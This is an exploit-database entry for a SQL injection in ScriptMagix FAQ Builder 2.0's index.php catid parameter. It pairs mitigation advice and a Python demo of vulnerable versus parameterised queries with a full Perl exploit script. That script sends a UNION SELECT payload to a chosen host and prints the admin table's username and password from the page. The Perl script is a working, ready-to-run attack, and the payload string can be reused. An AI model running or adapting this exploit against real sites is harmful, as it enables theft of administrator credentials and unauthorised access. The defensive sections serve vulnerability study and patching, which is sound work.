Vendor: FAQ Builder
By: ajann
CVSS: 7.5 (HIGH)
Type: Remote Blind SQL Injection
CWE: 89
Product Name: FAQ Builder
Affected Version From: <=2.0
Affected Version To: 2
Patch Exists: NO
Related CWE:
CPE: a:scriptmagix:faq_builder:2.0
Metasploit:
Other Scripts:
Platforms Tested: Unknown

ScriptMagix FAQ Builder <= 2.0 (index.php) Remote Blind SQL Injection Exploit

This exploit targets the catid parameter of index.php (cmd=2) in ScriptMagix FAQ Builder 2.0 and earlier. The parameter is placed into a SQL query without validation, so the script injects a UNION SELECT that pulls the username and password columns of the admin table into the page response and reads them back with a regular expression. Although the entry is titled blind, the payload's result is echoed directly in the page, so the credentials are read straight from the response rather than inferred bit by bit.

Mitigation:

No fixed version is recorded for this entry (Patch Exists: NO). Until the vendor ships one, the correct fix on the application side is to treat catid as an integer: reject any value that is not a plain integer and bind it as a parameter to a prepared statement rather than concatenating it into the query. Filtering the string "union select" at a proxy or web application firewall is only a stopgap, not a fix.
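To make the mechanism concrete, here is an added example (not code from this page, from the exploit author, or from ScriptMagix) that models the query shape the payload implies: a category lookup that concatenates catid into SQL, beside a version that validates and binds it. It uses SQLite, so the payload is reduced to a 4-column table with || in place of MySQL's concat() and -- in place of /*; the faq and admin rows and the password hash are constructed sample data, and render() is an assumed stand-in for the HTML index.php would emit.

```python
import re
import sqlite3

# Constructed sample data standing in for the FAQ Builder database: a 4-column faq
# table (the real product's query appears to return 15 columns) and the admin table
# the payload reads from. The credentials are made up.
SCHEMA = """
CREATE TABLE faq(id INTEGER, catid INTEGER, question TEXT, answer TEXT);
INSERT INTO faq VALUES (1, 1, 'How do I reset my password?', 'Use the reset link.');
INSERT INTO faq VALUES (2, 2, 'Where are logs kept?', 'In the logs/ directory.');
CREATE TABLE admin(username TEXT, password TEXT);
INSERT INTO admin VALUES ('admin', '5f4dcc3b5aa765d61d8327deb882cf99');
"""


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def faq_by_cat_vulnerable(conn, catid):
    """String-concatenated query: the shape the exploit assumes behind index.php?cmd=2&catid=."""
    sql = "SELECT id, catid, question, answer FROM faq WHERE catid=" + catid
    return conn.execute(sql).fetchall()


def faq_by_cat_fixed(conn, catid):
    """Hardened: catid must be a plain integer and is bound as a parameter, never concatenated."""
    if not re.fullmatch(r"\d+", catid):
        raise ValueError("catid must be an integer")
    sql = "SELECT id, catid, question, answer FROM faq WHERE catid=?"
    return conn.execute(sql, (int(catid),)).fetchall()


# The page's payload reduced to the 4-column table above. As in the original, the two
# markers are spelled with char() so the request carries no quote characters
# (char(117,...) is "username:", char(112,...) is "password:"), and the union puts the
# concatenation in the column that is rendered in the page (here: answer).
PAYLOAD = ("-1 UNION SELECT 0,1,2,"
           "char(117,115,101,114,110,97,109,101,58)||username||"
           "char(112,97,115,115,119,111,114,100,58)||password FROM admin --")


def render(rows):
    """Assumed stand-in for the HTML the application emits: question, then answer, each followed by <br>."""
    return "".join(f"<b>{q}</b><br>{a}<br>" for (_id, _cat, q, a) in rows)


# Same two matches the Perl exploit applies to the response, folded into one pattern.
CRED_RE = re.compile(r"username:(.*?)password:(.*?)<br>")


def extract_credentials(html):
    m = CRED_RE.search(html)
    return (m.group(1), m.group(2)) if m else None


def run_against(fetch):
    """Credentials the payload leaks through `fetch`, or None if the input is rejected or the query errors.

    A column-count mismatch raises sqlite3.OperationalError here, which corresponds to the
    "Syntax error" / 500 responses the exploit script treats as failure."""
    conn = open_db()
    try:
        rows = fetch(conn, PAYLOAD)
    except (ValueError, sqlite3.Error):
        return None
    return extract_credentials(render(rows))


if __name__ == "__main__":
    print("vulnerable:", run_against(faq_by_cat_vulnerable))
    print("fixed:     ", run_against(faq_by_cat_fixed))
```

The vulnerable path returns the admin row's username and hash exactly as the Perl script would print them; the fixed path rejects the payload before any SQL runs, and an ordinary request such as catid=1 still returns the category's rows.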

Exploit-DB raw data:

#!/usr/bin/perl
#[Script Name: ScriptMagix FAQ Builder <= 2.0 (index.php) Remote Blind SQL Injection Exploit
#[Coded by   : ajann
#[Author     : ajann
#[Contact    : :(
#[S.Page     : http://www.scriptmagix.com
#[$$         : 50$
#[..         : ajann,Turkey

use strict;
use warnings;
use IO::Socket;

if (@ARGV < 1) {
    print "
[========================================================================
[//   	ScriptMagix FAQ Builder <= 2.0 (index.php) Remote Blind SQL Injection Exploit
[//                   Usage: exploit.pl [target]
[//                   Example: exploit.pl victim.com
[//                           Vuln&Exp : ajann
[========================================================================
";
    exit();
}

# Local variables: accept "victim.com" or "http://victim.com", always talk plain HTTP on port 80
my $server = $ARGV[0];
$server =~ s/^http:\/\///;
my $host = "http://" . $server;
my $port = 80;
my $file = "/index.php?cmd=2&catid=";   # catid is the injectable parameter

print "Script <DIR> : ";
my $dir = <STDIN>;
chomp($dir);    # chomp strips only a trailing newline; chop would also eat the last real character

if ($dir =~ /exit/) {
    print "-- Exploit Failed[You Are Exited] \n";
    exit();
}

# The install directory must be given as a path, e.g. "/" or "/faq/"
unless ($dir =~ /\//) {
    print "-- Exploit Failed[No DIR] \n";
    exit();
}

# Union payload: the vulnerable query returns 15 columns and the 7th is rendered in the page,
# so that column carries concat('username:', username, 'password:', password) from the admin
# table. The two markers are written as char() calls so the request contains no quote
# characters, and the trailing /* comments out whatever follows catid in the original query.
my $target = "-1%20union%20select%200,1,2,3,4,5,concat(char(117,115,101,114,110,97,109,101,58),username,char(112,97,115,115,119,111,114,100,58),password),7,8,0,0,0,0,0,0%20from%20admin/*";
$target = $host . $dir . $file . $target;

# Writing data to socket (HTTP requires CRLF line endings)
print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
my $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $server, PeerPort => $port)
    or die "\n+ Connection failed...\n";
print $socket "GET $target HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "+ Connected!...\n";

# Getting: scan the response for the markers the payload planted, or for a failure indicator
while (my $answer = <$socket>) {
    if ($answer =~ /username:(.*?)pass/) {
        print "+ Exploit succeed! Getting admin information.\n";
        print "+ ---------------- +\n";
        print "+ Username: $1\n";
    }

    if ($answer =~ /password:(.*?)<br>/) {
        print "+ Password: $1\n";
    }

    # A column-count mismatch or a non-vulnerable target shows up as a SQL error or a 500
    if ($answer =~ /Syntax error/) {
        print "+ Exploit Failed : ( \n";
        print "+**********************************************************************+\n";
        exit();
    }

    if ($answer =~ /Internal Server Error/) {
        print "+ Exploit Failed : (  \n";
        print "+**********************************************************************+\n";
        exit();
    }
}

# milw0rm.com [2007-03-18]